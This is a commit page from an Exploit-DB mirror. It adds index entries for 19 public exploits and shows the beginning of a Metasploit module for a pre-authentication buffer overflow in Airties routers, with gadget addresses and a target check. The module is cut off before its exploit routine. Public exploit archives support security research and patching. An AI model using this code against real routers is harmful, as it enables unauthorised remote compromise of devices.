bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-06-02

Browse source 
19 new exploits
This commit is contained in:
Offensive Security 2015-06-02 05:02:25 +00:00
parent 75bd2aed32
commit 3df3d6d656
20 changed files with 1493 additions and 8 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

35
files.csv
View file

@ -591,7 +591,7 @@ id,file,description,date,author,platform,type,port
764,platforms/linux/remote/764.c,"Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)",2003-04-04,spabam,linux,remote,80 764,platforms/linux/remote/764.c,"Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)",2003-04-04,spabam,linux,remote,80
765,platforms/windows/remote/765.c,"Microsoft Internet Explorer .ANI files handling Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0 765,platforms/windows/remote/765.c,"Microsoft Internet Explorer .ANI files handling Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0
766,platforms/osx/local/766.c,"Mac OS X <= 10.3.7 mRouter Local Privilege Escalation Exploit",2005-01-22,nemo,osx,local,0 766,platforms/osx/local/766.c,"Mac OS X <= 10.3.7 mRouter Local Privilege Escalation Exploit",2005-01-22,nemo,osx,local,0
767,platforms/windows/remote/767.pl,"Golden FTP Server <= 2.02b Remote Buffer Overflow Exploit",2005-01-22,Barabas,windows,remote,21 767,platforms/windows/remote/767.pl,"Golden FTP Server <= 2.02b - Remote Buffer Overflow Exploit",2005-01-22,Barabas,windows,remote,21
769,platforms/windows/local/769.c,"Funduc Search and Replace Compressed File Local BoF Exploit",2005-01-24,ATmaCA,windows,local,0 769,platforms/windows/local/769.c,"Funduc Search and Replace Compressed File Local BoF Exploit",2005-01-24,ATmaCA,windows,local,0
770,platforms/windows/dos/770.txt,"Apple QuickTime <= 6.5.2.10 - (.qtif) Image Parsing Vulnerability",2005-01-24,ATmaCA,windows,dos,0 770,platforms/windows/dos/770.txt,"Apple QuickTime <= 6.5.2.10 - (.qtif) Image Parsing Vulnerability",2005-01-24,ATmaCA,windows,dos,0
771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer .ANI files handling Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0 771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer .ANI files handling Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0
@ -959,7 +959,7 @@ id,file,description,date,author,platform,type,port
1157,platforms/cgi/webapps/1157.pl,"GTChat <= 0.95 Alpha Remote Denial of Service Exploit",2005-08-18,RusH,cgi,webapps,0 1157,platforms/cgi/webapps/1157.pl,"GTChat <= 0.95 Alpha Remote Denial of Service Exploit",2005-08-18,RusH,cgi,webapps,0
1158,platforms/windows/dos/1158.pl,"WS_FTP Server <= 5.03 (RNFR) Buffer Overflow Exploit",2004-11-29,"Reed Arvin",windows,dos,0 1158,platforms/windows/dos/1158.pl,"WS_FTP Server <= 5.03 (RNFR) Buffer Overflow Exploit",2004-11-29,"Reed Arvin",windows,dos,0
1159,platforms/windows/dos/1159.pl,"Mercury/32 Mail Server <= 4.01a (check) Buffer Overflow Exploit",2004-12-01,"Reed Arvin",windows,dos,0 1159,platforms/windows/dos/1159.pl,"Mercury/32 Mail Server <= 4.01a (check) Buffer Overflow Exploit",2004-12-01,"Reed Arvin",windows,dos,0
1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro <= 2.52 (USER) Remote Buffer Overflow Exploit",2005-04-27,"Reed Arvin",windows,dos,0 1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro <= 2.52 - (USER) Remote Buffer Overflow Exploit",2005-04-27,"Reed Arvin",windows,dos,0
1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 - Local Privilege Escalation Exploit",2005-04-27,"Reed Arvin",windows,local,0 1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 - Local Privilege Escalation Exploit",2005-04-27,"Reed Arvin",windows,local,0
1162,platforms/windows/dos/1162.pl,"GoodTech SMTP Server <= 5.14 - Denial of Service Exploit",2005-06-07,"Reed Arvin",windows,dos,0 1162,platforms/windows/dos/1162.pl,"GoodTech SMTP Server <= 5.14 - Denial of Service Exploit",2005-06-07,"Reed Arvin",windows,dos,0
1163,platforms/windows/dos/1163.pl,"IA eMailServer Corporate Edition <= 5.2.2 - DoS Exploit",2005-06-26,"Reed Arvin",windows,dos,0 1163,platforms/windows/dos/1163.pl,"IA eMailServer Corporate Edition <= 5.2.2 - DoS Exploit",2005-06-26,"Reed Arvin",windows,dos,0
@ -1150,7 +1150,7 @@ id,file,description,date,author,platform,type,port
1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0 1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0
1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 - Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0 1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 - Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0
1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143
1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 (APPE) Remote Overflow Exploit (meta)",2005-12-20,redsand,windows,remote,21 1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 - (APPE) Remote Overflow Exploit (meta)",2005-12-20,redsand,windows,remote,21
1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated)",2006-02-20,DarkFig,php,webapps,0 1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated)",2006-02-20,DarkFig,php,webapps,0
1383,platforms/php/webapps/1383.txt,"phpBB <= 2.0.18 - Remote XSS Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0 1383,platforms/php/webapps/1383.txt,"phpBB <= 2.0.18 - Remote XSS Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0
1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 (rating) Parameter Remote SQL Injection Exploit",2005-12-23,krasza,php,webapps,0 1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 (rating) Parameter Remote SQL Injection Exploit",2005-12-23,krasza,php,webapps,0
@ -1458,7 +1458,7 @@ id,file,description,date,author,platform,type,port
1740,platforms/php/webapps/1740.pl,"Fast Click <= 1.1.3 / <= 2.3.8 - (show.php) Remote File Inclusion Exploit",2006-05-02,R@1D3N,php,webapps,0 1740,platforms/php/webapps/1740.pl,"Fast Click <= 1.1.3 / <= 2.3.8 - (show.php) Remote File Inclusion Exploit",2006-05-02,R@1D3N,php,webapps,0
1741,platforms/linux/remote/1741.c,"MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit",2006-05-02,"Stefano Di Paola",linux,remote,3306 1741,platforms/linux/remote/1741.c,"MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit",2006-05-02,"Stefano Di Paola",linux,remote,3306
1742,platforms/linux/remote/1742.c,"MySQL <= 4.1.18 / 5.0.20 - Local/Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0 1742,platforms/linux/remote/1742.c,"MySQL <= 4.1.18 / 5.0.20 - Local/Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0
1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 (APPE) Remote Buffer Overflow PoC",2006-05-03,"Jerome Athias",windows,dos,0 1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - (APPE) Remote Buffer Overflow PoC",2006-05-03,"Jerome Athias",windows,dos,0
1744,platforms/php/webapps/1744.pl,"Albinator <= 2.0.6 (Config_rootdir) Remote File Inclusion Exploit",2006-05-03,webDEViL,php,webapps,0 1744,platforms/php/webapps/1744.pl,"Albinator <= 2.0.6 (Config_rootdir) Remote File Inclusion Exploit",2006-05-03,webDEViL,php,webapps,0
1746,platforms/linux/dos/1746.pl,"zawhttpd <= 0.8.23 (GET) Remote Buffer Overflow DoS",2006-05-04,"Kamil Sienicki",linux,dos,0 1746,platforms/linux/dos/1746.pl,"zawhttpd <= 0.8.23 (GET) Remote Buffer Overflow DoS",2006-05-04,"Kamil Sienicki",linux,dos,0
1747,platforms/php/webapps/1747.pl,"Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit",2006-05-04,webDEViL,php,webapps,0 1747,platforms/php/webapps/1747.pl,"Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit",2006-05-04,webDEViL,php,webapps,0
@ -2590,7 +2590,7 @@ id,file,description,date,author,platform,type,port
2913,platforms/php/webapps/2913.php,"phpAlbum <= 0.4.1 Beta 6 (language.php) Local File Inclusion Exploit",2006-12-10,Kacper,php,webapps,0 2913,platforms/php/webapps/2913.php,"phpAlbum <= 0.4.1 Beta 6 (language.php) Local File Inclusion Exploit",2006-12-10,Kacper,php,webapps,0
2914,platforms/windows/dos/2914.php,"Filezilla FTP Server <= 0.9.21 (LIST/NLST) Denial of Service Exploit",2006-12-11,shinnai,windows,dos,0 2914,platforms/windows/dos/2914.php,"Filezilla FTP Server <= 0.9.21 (LIST/NLST) Denial of Service Exploit",2006-12-11,shinnai,windows,dos,0
2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 (ARP Flood) Remote Denial of Service Exploit",2006-12-11,poplix,hardware,dos,0 2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 (ARP Flood) Remote Denial of Service Exploit",2006-12-11,poplix,hardware,dos,0
2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 (USER/PASS) Heap Overflow PoC",2006-12-11,rgod,windows,dos,0 2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow PoC",2006-12-11,rgod,windows,dos,0
2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 (common.php) Remote Inclusion Vulnerability",2006-12-11,bd0rk,php,webapps,0 2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 (common.php) Remote Inclusion Vulnerability",2006-12-11,bd0rk,php,webapps,0
2919,platforms/php/webapps/2919.pl,"mxBB Module Activity Games 0.92 - Remote File Include Vulnerability",2006-12-11,3l3ctric-Cracker,php,webapps,0 2919,platforms/php/webapps/2919.pl,"mxBB Module Activity Games 0.92 - Remote File Include Vulnerability",2006-12-11,3l3ctric-Cracker,php,webapps,0
2920,platforms/php/webapps/2920.txt,"Barman 0.0.1r3 (interface.php) Remote File Include Vulnerability",2006-12-11,DeltahackingTEAM,php,webapps,0 2920,platforms/php/webapps/2920.txt,"Barman 0.0.1r3 (interface.php) Remote File Include Vulnerability",2006-12-11,DeltahackingTEAM,php,webapps,0
@ -9558,7 +9558,7 @@ id,file,description,date,author,platform,type,port
10255,platforms/bsd/local/10255.txt,"FreeBSD Run-Time Link-Editor Local r00t (0day)",2009-11-30,kingcope,bsd,local,0 10255,platforms/bsd/local/10255.txt,"FreeBSD Run-Time Link-Editor Local r00t (0day)",2009-11-30,kingcope,bsd,local,0
10256,platforms/php/webapps/10256.txt,"WP-Polls 2.x Incorrect Flood Filter",2009-11-30,Jbyte,php,webapps,0 10256,platforms/php/webapps/10256.txt,"WP-Polls 2.x Incorrect Flood Filter",2009-11-30,Jbyte,php,webapps,0
10257,platforms/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",windows,dos,21 10257,platforms/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",windows,dos,21
10258,platforms/windows/remote/10258.pl,"Golden FTP Server 4.30 File Deletion Vulnerability",2009-12-01,sharpe,windows,remote,21 10258,platforms/windows/remote/10258.pl,"Golden FTP Server 4.30 - File Deletion Vulnerability",2009-12-01,sharpe,windows,remote,21
10259,platforms/php/webapps/10259.txt,"Ciamos CMS <= 0.9.5 (module_path) Remote File Inclusion Vulnerability",2009-12-01,"cr4wl3r ",php,webapps,0 10259,platforms/php/webapps/10259.txt,"Ciamos CMS <= 0.9.5 (module_path) Remote File Inclusion Vulnerability",2009-12-01,"cr4wl3r ",php,webapps,0
10260,platforms/php/webapps/10260.txt,"Robert Zimmerman PHP / MYSQL Scripts Admin Bypass",2009-12-01,DUNDEE,php,webapps,0 10260,platforms/php/webapps/10260.txt,"Robert Zimmerman PHP / MYSQL Scripts Admin Bypass",2009-12-01,DUNDEE,php,webapps,0
10261,platforms/linux/webapps/10261.txt,"Dotdefender Remote Command Execution 3.8-5",2009-12-01,"John Dos",linux,webapps,80 10261,platforms/linux/webapps/10261.txt,"Dotdefender Remote Command Execution 3.8-5",2009-12-01,"John Dos",linux,webapps,80
@ -15085,7 +15085,7 @@ id,file,description,date,author,platform,type,port
17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities",2011-05-30,metasploit,windows,remote,0 17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities",2011-05-30,metasploit,windows,remote,0
17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW series auth bypass printer flooder",2011-05-31,chrisB,hardware,dos,0 17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW series auth bypass printer flooder",2011-05-31,chrisB,hardware,dos,0
17354,platforms/windows/remote/17354.py,"Easy Ftp Server 1.7.0.2 - Post-Authentication BoF",2011-06-01,b33f,windows,remote,0 17354,platforms/windows/remote/17354.py,"Easy Ftp Server 1.7.0.2 - Post-Authentication BoF",2011-06-01,b33f,windows,remote,0
17355,platforms/windows/remote/17355.rb,"GoldenFTP 4.70 PASS Stack Buffer Overflow",2011-06-02,metasploit,windows,remote,21 17355,platforms/windows/remote/17355.rb,"Golden FTP 4.70 - PASS Stack Buffer Overflow",2011-06-02,metasploit,windows,remote,21
17356,platforms/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote,0 17356,platforms/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote,0
18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow Vulnerability",2012-04-08,Vulnerability-Lab,windows,dos,0 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow Vulnerability",2012-04-08,Vulnerability-Lab,windows,dos,0
17359,platforms/windows/remote/17359.pl,"Xitami Web Server 2.5b4 - Remote Buffer Overflow Exploit",2011-06-03,mr.pr0n,windows,remote,0 17359,platforms/windows/remote/17359.pl,"Xitami Web Server 2.5b4 - Remote Buffer Overflow Exploit",2011-06-03,mr.pr0n,windows,remote,0
@ -31760,7 +31760,7 @@ id,file,description,date,author,platform,type,port
35241,platforms/windows/remote/35241.pl,"ESTsoft ALZip 8.12.0.3 - (.zip) Buffer Overflow Vulnerability",2011-01-19,"C4SS!0 G0M3S",windows,remote,0 35241,platforms/windows/remote/35241.pl,"ESTsoft ALZip 8.12.0.3 - (.zip) Buffer Overflow Vulnerability",2011-01-19,"C4SS!0 G0M3S",windows,remote,0
35242,platforms/multiple/remote/35242.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/searchView.jsp searchWord Parameter XSS",2008-04-24,Rob,multiple,remote,0 35242,platforms/multiple/remote/35242.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/searchView.jsp searchWord Parameter XSS",2008-04-24,Rob,multiple,remote,0
35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/workingSetManager.jsp workingSet Parameter XSS",2008-04-24,Rob,multiple,remote,0 35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/workingSetManager.jsp workingSet Parameter XSS",2008-04-24,Rob,multiple,remote,0
35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 Malformed Message Denial Of Service Vulnerability",2011-01-19,"Craig Freyman",windows,dos,0 35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 - Malformed Message Denial Of Service Vulnerability",2011-01-19,"Craig Freyman",windows,dos,0
35245,platforms/php/webapps/35245.txt,"PHPAuctions 'viewfaqs.php' SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0 35245,platforms/php/webapps/35245.txt,"PHPAuctions 'viewfaqs.php' SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0
35246,platforms/php/webapps/35246.py,"Joomla HD FLV Player < 2.1.0.1 - Arbitrary File Download Vulnerability",2014-11-15,"Claudio Viviani",php,webapps,0 35246,platforms/php/webapps/35246.py,"Joomla HD FLV Player < 2.1.0.1 - Arbitrary File Download Vulnerability",2014-11-15,"Claudio Viviani",php,webapps,0
35248,platforms/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - XSS Vulnerability",2014-11-15,"Halil Dalabasmaz",multiple,webapps,0 35248,platforms/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - XSS Vulnerability",2014-11-15,"Halil Dalabasmaz",multiple,webapps,0
@ -33251,6 +33251,7 @@ id,file,description,date,author,platform,type,port
36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0 36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0
36994,platforms/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 'DOC' Parameter Directory Traversal Vulnerability",2009-04-17,MustLive,cgi,webapps,0 36994,platforms/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 'DOC' Parameter Directory Traversal Vulnerability",2009-04-17,MustLive,cgi,webapps,0
36995,platforms/hardware/remote/36995.txt,"F5 FirePass <= 7.0 SQL Injection Vulnerability",2012-03-14,anonymous,hardware,remote,0 36995,platforms/hardware/remote/36995.txt,"F5 FirePass <= 7.0 SQL Injection Vulnerability",2012-03-14,anonymous,hardware,remote,0
37169,platforms/linux/remote/37169.rb,"Realtek SDK Miniigd UPnP SOAP Command Execution",2015-06-01,metasploit,linux,remote,52869
37065,platforms/windows/local/37065.txt,"Comodo GeekBuddy < 4.18.121 - Local Privilege Escalation",2015-05-20,"Jeremy Brown",windows,local,0 37065,platforms/windows/local/37065.txt,"Comodo GeekBuddy < 4.18.121 - Local Privilege Escalation",2015-05-20,"Jeremy Brown",windows,local,0
36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - SEH Overflow Crash PoC",2015-04-28,"Avinash Thapa",windows,dos,0 36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - SEH Overflow Crash PoC",2015-04-28,"Avinash Thapa",windows,dos,0
36853,platforms/php/webapps/36853.txt,"Dolphin 7.0.x viewFriends.php Multiple Parameter XSS",2012-02-21,"Aung Khant",php,webapps,0 36853,platforms/php/webapps/36853.txt,"Dolphin 7.0.x viewFriends.php Multiple Parameter XSS",2012-02-21,"Aung Khant",php,webapps,0
@ -33435,6 +33436,7 @@ id,file,description,date,author,platform,type,port
37047,platforms/php/webapps/37047.html,"osCMax 2.5 admin/login.php username Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37047,platforms/php/webapps/37047.html,"osCMax 2.5 admin/login.php username Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37048,platforms/php/webapps/37048.txt,"osCMax 2.5 admin/stats_monthly_sales.php status Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37048,platforms/php/webapps/37048.txt,"osCMax 2.5 admin/stats_monthly_sales.php status Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0
37049,platforms/windows/local/37049.txt,"Microsoft Windows - Local Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0 37049,platforms/windows/local/37049.txt,"Microsoft Windows - Local Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0
37050,platforms/php/webapps/37050.txt,"Chronosite 5.12 - SQL Injection",2015-05-18,"Wad Deek",php,webapps,0
37051,platforms/linux/dos/37051.c,"OpenLitespeed 1.3.9 - Use After Free (DoS)",2015-05-18,"Denis Andzakovic",linux,dos,0 37051,platforms/linux/dos/37051.c,"OpenLitespeed 1.3.9 - Use After Free (DoS)",2015-05-18,"Denis Andzakovic",linux,dos,0
37052,platforms/windows/local/37052.c,"Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0 37052,platforms/windows/local/37052.c,"Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0
37053,platforms/multiple/dos/37053.c,"QEMU - Floppy Disk Controller (FDC) PoC",2015-05-18,"Marcus Meissner",multiple,dos,0 37053,platforms/multiple/dos/37053.c,"QEMU - Floppy Disk Controller (FDC) PoC",2015-05-18,"Marcus Meissner",multiple,dos,0
@ -33481,6 +33483,7 @@ id,file,description,date,author,platform,type,port
37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 'username' Parameter Cross Site Scripting Vulnerability",2012-04-20,sonyy,php,webapps,0 37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 'username' Parameter Cross Site Scripting Vulnerability",2012-04-20,sonyy,php,webapps,0
37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0 37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0
37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass and Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0 37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass and Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0
37098,platforms/windows/local/37098.txt,"Microsoft Windows - Local Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0
37100,platforms/php/webapps/37100.txt,"Waylu CMS 'products_xx.php' SQL Injection and HTML Injection Vulnerabilities",2012-04-20,TheCyberNuxbie,php,webapps,0 37100,platforms/php/webapps/37100.txt,"Waylu CMS 'products_xx.php' SQL Injection and HTML Injection Vulnerabilities",2012-04-20,TheCyberNuxbie,php,webapps,0
37101,platforms/php/webapps/37101.txt,"Joomla CCNewsLetter Module 1.0.7 'id' Parameter SQL Injection Vulnerability",2012-04-23,E1nzte1N,php,webapps,0 37101,platforms/php/webapps/37101.txt,"Joomla CCNewsLetter Module 1.0.7 'id' Parameter SQL Injection Vulnerability",2012-04-23,E1nzte1N,php,webapps,0
37102,platforms/php/webapps/37102.txt,"Joomla! Video Gallery component Local File Include and SQL Injection Vulnerabilities",2012-04-24,KedAns-Dz,php,webapps,0 37102,platforms/php/webapps/37102.txt,"Joomla! Video Gallery component Local File Include and SQL Injection Vulnerabilities",2012-04-24,KedAns-Dz,php,webapps,0
@ -33532,4 +33535,20 @@ id,file,description,date,author,platform,type,port
37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0 37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0
37149,platforms/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash PoC",2015-05-29,3unnym00n,windows,dos,22 37149,platforms/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash PoC",2015-05-29,3unnym00n,windows,dos,22
37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80 37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80
37170,platforms/hardware/remote/37170.rb,"Airties login-cgi Buffer Overflow",2015-06-01,metasploit,hardware,remote,0
37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80 37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80
37155,platforms/php/webapps/37155.txt,"WordPress WP-FaceThumb 0.1 'pagination_wp_facethum' Parameter Cross Site Scripting Vulnerability",2012-05-13,d3v1l,php,webapps,0
37156,platforms/php/webapps/37156.txt,"GetSimple CMS 3.1 admin/theme.php err Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0
37157,platforms/php/webapps/37157.txt,"GetSimple CMS 3.1 admin/pages.php error Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0
37158,platforms/php/webapps/37158.txt,"GetSimple CMS 3.1 admin/index.php Multiple Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0
37159,platforms/php/webapps/37159.txt,"GetSimple CMS 3.1 admin/upload.php path Parameter XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0
37160,platforms/windows/dos/37160.pl,"Universal Reader 1.16.740.0 'uread.exe' Denial Of Service Vulnerability",2012-05-14,demonalex,windows,dos,0
37161,platforms/php/webapps/37161.txt,"WordPress GRAND Flash Album Gallery 1.71 'admin.php' Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0
37162,platforms/php/webapps/37162.txt,"Dynamic Widgets WordPress Plugin 1.5.1 'themes.php' Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0
37163,platforms/windows/remote/37163.py,"IBM Security AppScan Standard <= 9.0.2 - OLE Automation Array Remote Code Execution",2015-06-01,"Naser Farhadi",windows,remote,0
37165,platforms/windows/remote/37165.py,"WebDrive 12.2 (Build # 4172) - Buffer OverFlow PoC",2015-06-01,metacom,windows,remote,0
37166,platforms/php/webapps/37166.php,"WordPress dzs-zoomsounds Plugins <= 2.0 - Remote File Upload Vulnerability",2015-06-01,"nabil chris",php,webapps,0
37167,platforms/linux/local/37167.c,"PonyOS <= 3.0 - VFS Permissions Exploit",2015-06-01,"Hacker Fantastic",linux,local,0
37168,platforms/linux/local/37168.txt,"PonyOS <= 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",linux,local,0
37171,platforms/hardware/remote/37171.rb,"D-Link Devices HNAP SOAPAction-Header Command Execution",2015-06-01,metasploit,hardware,remote,0
37172,platforms/hardware/webapps/37172.txt,"Aruba ClearPass Policy Manager Stored XSS",2015-06-01,"Cristiano Maruti",hardware,webapps,0

Can't render this file because it is too large.

151
platforms/hardware/remote/37170.rb Executable file
View file

@ -0,0 +1,151 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Airties login-cgi Buffer Overflow',
'Description' => %q{
This module exploits a remote buffer overflow vulnerability on several Airties routers.
The vulnerability exists in the handling of HTTP queries to the login cgi with long
redirect parametres. The vulnerability doesn't require authentication. This module has
been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation.
Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT,
Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable.
},
'Author' =>
[
'Batuhan Burakcin <batuhan[at]bmicrosystems.com>', # discovered the vulnerability
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'Arch' => ARCH_MIPSBE,
'References' =>
[
['EDB', '36577'],
['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], #advisory
['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] #PoC
],
'Targets' =>
[
[ 'AirTies_Air5650v3TT_FW_1.0.2.0',
{
'Offset' => 359,
'LibcBase' => 0x2aad1000,
'RestoreReg' => 0x0003FE20, # restore s-registers
'System' => 0x0003edff, # address of system-1
'CalcSystem' => 0x000111EC, # calculate the correct address of system
'CallSystem' => 0x00041C10, # call our system
'PrepareSystem' => 0x000215b8 # prepare $a0 for our system call
}
]
],
'DisclosureDate' => 'Mar 31 2015',
'DefaultTarget' => 0))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR')
end
def check
begin
res = send_request_cgi({
'uri' => '/cgi-bin/login',
'method' => 'GET'
})
if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /login.html\?ErrorCode=2/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
